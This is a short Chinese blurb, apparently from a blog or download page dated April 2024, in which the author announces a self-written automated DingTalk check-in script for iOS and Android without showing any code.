为了解决这些烦恼,我开始思考是否可以通过编写一个全自动化脚本来实现钉钉打卡。经过一段时间的摸索和学习,我终于成功编写出了一个适用于苹果和安卓系统的钉钉打卡脚本。
2024-04-09 15:03
15KB